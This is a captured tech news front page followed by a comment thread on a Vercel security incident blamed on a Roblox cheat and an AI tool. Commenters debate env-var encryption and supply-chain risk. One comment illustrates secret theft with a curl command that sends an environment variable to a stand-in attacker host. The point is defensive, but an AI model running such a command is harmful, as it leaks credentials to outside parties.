frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

fp.

John Ternus to become Apple CEO

https://www.apple.com/newsroom/2026/04/tim-cook-to-become-apple-executive-chairman-john-ternus-to...
1576•schappim•9h ago•781 comments

Anthropic says OpenClaw-style Claude CLI usage is allowed again

https://docs.openclaw.ai/providers/anthropic
73•jmsflknr•2h ago•29 comments

How to make a fast dynamic language interpreter

https://zef-lang.dev/implementation
125•pizlonator•5h ago•17 comments

Show HN: Mediator.ai – Using Nash bargaining and LLMs to systematize fairness

https://mediator.ai/
30•sanity•15h ago•9 comments

The Beauty of Bonsai Styles

https://longwoodgardens.org/blog/2023-05-17/beauty-bonsai-styles
17•lagniappe•2h ago•2 comments

Qwen3.6-Max-Preview: Smarter, Sharper, Still Evolving

https://qwen.ai/blog?id=qwen3.6-max-preview
593•mfiguiere•16h ago•317 comments

A Roblox cheat and one AI tool brought down Vercel's platform

https://webmatrices.com/post/how-a-roblox-cheat-and-one-ai-tool-brought-down-vercel-s-entire-plat...
83•bishwasbh•2h ago•33 comments

How a subsea cable is repaired

https://www.onesteppower.com/post/subsea-cable-repair
37•slicktux•4d ago•8 comments

Jujutsu megamerges for fun and profit

https://isaaccorbrey.com/notes/jujutsu-megamerges-for-fun-and-profit
202•icorbrey•9h ago•82 comments

Kimi vendor verifier – verify accuracy of inference providers

https://www.kimi.com/blog/kimi-vendor-verifier
226•Alifatisk•11h ago•20 comments

Ternary Bonsai: Top Intelligence at 1.58 Bits

https://prismml.com/news/ternary-bonsai
123•nnx•3d ago•26 comments

Air is full of DNA

https://www.nature.com/articles/d41586-026-01099-2
68•howrude•2d ago•11 comments

Prediction markets are breaking the news and becoming their own beat

https://www.niemanlab.org/2026/04/prediction-markets-are-breaking-the-news-and-becoming-their-own...
21•gnabgib•4h ago•4 comments

Japan's cherry blossom database, 1,200 years old, has a new keeper

https://www.nytimes.com/2026/04/17/climate/japan-cherry-blossom-database-scientist.html
68•caycep•3d ago•7 comments

ggsql: A Grammar of Graphics for SQL

https://opensource.posit.co/blog/2026-04-20_ggsql_alpha_release/
391•thomasp85•17h ago•78 comments

Soul Player C64 – A real transformer running on a 1 MHz Commodore 64

https://github.com/gizmo64k/soulplayer-c64
111•adunk•10h ago•27 comments

Quantum Computers Are Not a Threat to 128-Bit Symmetric Keys

https://words.filippo.io/128-bits/
191•hasheddan•13h ago•72 comments

Monero Community Crowdfunding System

https://ccs.getmonero.org/ideas/
69•OsrsNeedsf2P•9h ago•46 comments

Tim Davis – Probabilistic engineering and the 24-7 employee

https://www.timdavis.com/blog/probabilistic-engineering-and-the-24-7-employee
10•kiyanwang•1d ago•3 comments

Brussels launched an age checking app. Hackers took 2 minutes to break it

https://www.politico.eu/article/eu-brussels-launched-age-checking-app-hackers-say-took-them-2-min...
194•axbyte•21h ago•89 comments

Modern Rendering Culling Techniques

https://krupitskas.com/posts/modern_culling_techniques/
127•krupitskas•1d ago•30 comments

All phones sold in the EU to have replaceable batteries from 2027

https://www.theolivepress.es/spain-news/2026/04/20/eu-to-force-replaceable-batteries-in-phones-an...
1134•ramonga•16h ago•955 comments

Year of the IPv6 Overlay Network

https://www.defined.net/blog/year-of-the-ipv6-overlay-network/
39•stock_toaster•3d ago•7 comments

Kefir C17/C23 Compiler

https://sr.ht/~jprotopopov/kefir/
143•conductor•3d ago•12 comments

OpenAI ad partner now selling ChatGPT ad placements based on “prompt relevance”

https://www.adweek.com/media/exclusive-leaked-deck-reveals-stackadapts-playbook-for-chatgpt-ads/
255•jlark77777•9h ago•126 comments

WebUSB Extension for Firefox

https://github.com/ArcaneNibble/awawausb
227•tuananh•18h ago•200 comments

Zero-Copy Pages in Rust: Or How I Learned to Stop Worrying and Love Lifetimes

https://redixhumayun.github.io/databases/2026/04/14/zero-copy-pages-in-rust.html
69•ingve•5d ago•6 comments

M 7.4 earthquake – 100 km ENE of Miyako, Japan

https://earthquake.usgs.gov/earthquakes/eventpage/us6000sri7/
275•Someone•20h ago•129 comments

10 years ago, someone wrote a test for Servo that included an expiry in 2026

https://mastodon.social/@jdm_/116429380667467307
209•luu•1d ago•117 comments

Atlassian enables default data collection to train AI

https://letsdatascience.com/news/atlassian-enables-default-data-collection-to-train-ai-f71343d8
556•kevcampb•18h ago•124 comments
Open in hackernews

A Roblox cheat and one AI tool brought down Vercel's platform

https://webmatrices.com/post/how-a-roblox-cheat-and-one-ai-tool-brought-down-vercel-s-entire-platform
82•bishwasbh•2h ago

Comments

EdwardDiego•1h ago
A frigging Roblox cheat...

And I thought it was bad when my son got compromised by a Roblox cheat, but they only they grabbed his Gamepass cookies and bought 4 Minecraft licenses, which MS quickly refunded...

jesse_dot_id•1h ago
> How many developers do you think knew that checkbox existed? How many assumed their database credentials and API keys were encrypted by default?

If I don't see asterisks, I'm not hitting save on the field with a secret in it. Maybe they were setting them programmatically? They should definitely still be looking to pass some kind of a secret flag, though. This is a weird problem for a company like Vercel to have.

apgwoz•1h ago
You pretty much have to assume someone is going to put sensitive data in an input like this. Encryption by default is the only sensible choice.
SOLAR_FIELDS•58m ago
Do you ask a bridge engineer if they forgot to reinforce the supports when they built the bridge? Even when I didn't know about security this was a table stakes thing. People saving sensitive things in plaintext are upset that their poor practices came back to bite them. Now, at the risk of sounding like I'm victim blaming here, Vercel is also totally bearing some responsibility for this insanity. But come on. FAFO and all that.
ethin•1h ago
This looks really really AI-generated even if the author did try to hide it by making some grammar elements improper. Idk if that diminishes it's accuracy though.
progbits•1h ago
I don't know why you are downvoted. The article is AI blogspam, it doesn't have any more factual information than eg https://www.darkreading.com/application-security/vercel-empl... and is full of empty LLMisms. It's depressing people are willing to read this.
mchl-mumo•58m ago
I didn't notice till I saw this comment and now I'm also confident it's significantly AI written.
progval•57m ago
Because a comment that just says it's AI generated provides no value to the readers. They could at least provide an alternative link like you did.
nilsbunger•18m ago
I thought the same. Normal people don’t write that way.
varun_ch•1h ago
Context.ai seems like it was the SPOF. By definition it has a lot of your data, and they didn’t secure it properly.
trick-or-treat•47m ago
Clearly, Vercel should not have been compromised by this. I don't know who Context.ai is but I do know Vercel and I expected better from them. I also think we can expect to see a lot more stories like this.
R41•1h ago
good article, these AI products are crazy supply chain risks.
mudkipdev•1h ago
I'm getting a "failed to verify your browser" error on this article
NitpickLawyer•45m ago
And, ironically, it's hosted on vercel :D
ChrisArchitect•1h ago
Related:

Vercel April 2026 security incident

https://news.ycombinator.com/item?id=47824463

ryanisnan•1h ago
Convenience is our Achilles heel, as a society.

We'll keep dangerous devices like the SuperBox in our homes, if it helps us get access to free movies and tv.

We'll use single-use plastics, even if we know they're bad for the environment, because they're just so damn easy.

We'll let AI run that thing for us, because it's just too easy.

A whole generation has grown up without knowing what it was like to infect your computer with AIDS trying to download an MP3, and it shows. That caution will come back, just at a terrible cost.

trick-or-treat•46m ago
When life gives you AIDS, make lemonAIDS!
notpachet•17m ago
> Convenience is our Achilles heel

More generically, our species' Achilles heel is our inability to factor in the long-term cost of negative externalities when evaluating processes that yield short-term positive results.

yoaviram•1h ago
I believe this is inaccurate. Vercel env vars are all encrypted at rest (on their side). The 'sensitive' checkbox means you can't retrieve the value once it's set, which would have saved your ass in this case. Also, annoying to read an article like this without a single link to source material.
trick-or-treat•50m ago
I think it's clear that some customers env vars got exposed, so that can only mean unencrypted, right?
TheDong•46m ago
They said "encrypted at rest", which they almost certainly are.

If you spin up an EC2 instance with an ftp server and check the "Encrypt my EBS volume" checkbox, all those files are 'encrypted at rest', but if your ftp password is 'admin/admin', your files will be exposed in plaintext quite quickly.

Vercel's backend is of course able to decrypt them too (or else it couldn't run your app for you), and so the attacker was able to view them, and presumably some other control on the backend made it so the sensitive ones can end up in your app, but can't be seen in whatever employee-only interface the attacker was viewing.

trick-or-treat•42m ago
Hmm, that's confusing. So they're eventually encrypted but plain-text at some point? Doesn't sound good TBH.
magackame•36m ago
It seems only encrypt and throw away the key would be the acceptable strategy
TheDong•33m ago
They need to give your app the environment variables later so they cannot throw away the key.

For non-sensitive environment variables, they also show you the value in the dashboard so you can check and edit them later.

Things like 'NODE_ENV=production' vs 'NODE_ENV=development' is probably something the user wants to see, so that's another argument for letting the backend decrypt and display those values even ignoring the "running your app" part.

You're welcome to add an input that goes straight to '/dev/null' if you want, but it's not exactly a useful feature.

bauruine•32m ago
How do you use them if you don't decrypt them? At some point you have to see them in plaintext. Even if they are sensitive and not shown in the UI you can still start an app and curl https://hacker.example/$my_encrypted_var to exfiltrate them.

What's best practice to handle env vars? How do poeple handle them "securely" without it just being security theater? What tools and workflows are people using?

trick-or-treat•19m ago
Yeah that's a good point. Dotenvx seems to claim a solution but I'm not smart enough to make sense of it.

However I do feel now like my sensitive things are better off deployed on a VPS where someone would need a ssh exploit to come at me.

TheDong•7m ago
dotenvx is a way to encrypt your secrets at rest. It's kinda like sops but not as good. https://getsops.io/

Notice how their tutorial says "run 'dotenvx run -- yourapp'". If you did 'dotenvx run -- env', all your secrets would be printed right there in plaintext, at runtime, since they're just encrypted at rest.

The equivalent in vercel would be encrypted in the database (the encrypted '.env' file), with a decryption key in the backend (the '.env.keys' file by default in dotenvx) used to show them in the frontend and decrypt them for running apps.

burnished•32m ago
There isn't really a way around it.
jakewins•30m ago
If a company says “encrypted at rest” that is generally compliance-speak for “not encrypted, but the hard drive partition is encrypted”.

Various certifications require this, I guess because they were written before hyper scalers and the assumed attack vector was that someone would literally steal a hard drive.

A running machine is not “at rest”, just like you can read files on your encrypted Mac HDD, the running program has decrypted access to the hard drive.

kstrauser•56m ago
I think this is wrong about what “sensitive” means here. AFAIK, all Vercel env cars are encrypted. The sensitive checkbox means that a develop looking at the env var can’t see what value is stored there. It’s a write-only value. Only the app can see it, via an env var (which obviously can’t be encrypted in such a way that the app can’t see it, otherwise it’d be worthless). If you don’t check that box, you can view the value in the project UI. That’s reasonable for most config values. Imagine “DEFAULT_TIME_ZONE” or such. There’s nothing gained from hiding it, and it’d be a pain in the ass come troubleshooting time.

So sensitive doesn’t mean encrypted. It means the UI doesn’t show the dev what value’s stored there after they’ve updated it. Not sensitive means it’s still visible. And again, I presume this is only a UI thing, and both kinds are stored encrypted in the backend.

I don’t work for Vercel, but I’ve use them a bit. I’m sure there are valid reasons to dislike them, but this specific bit looks like a strawman.

trick-or-treat•53m ago
According to the email I got from Vercel it was a limited subset of customers and I'm not one:

Initially, we identified a limited subset of customers whose Vercel credentials were compromised. We reached out to that subset and recommended that they rotate their credentials immediately.

At this time, we do not have reason to believe that your Vercel credentials or personal data have been compromised.

doctorpangloss•41m ago
This article is LLM authored and full of hallucinations. "Let that sink in for a second."
souravroyetl•30m ago
Even Anthropic is now poised as a Supply chain Risk.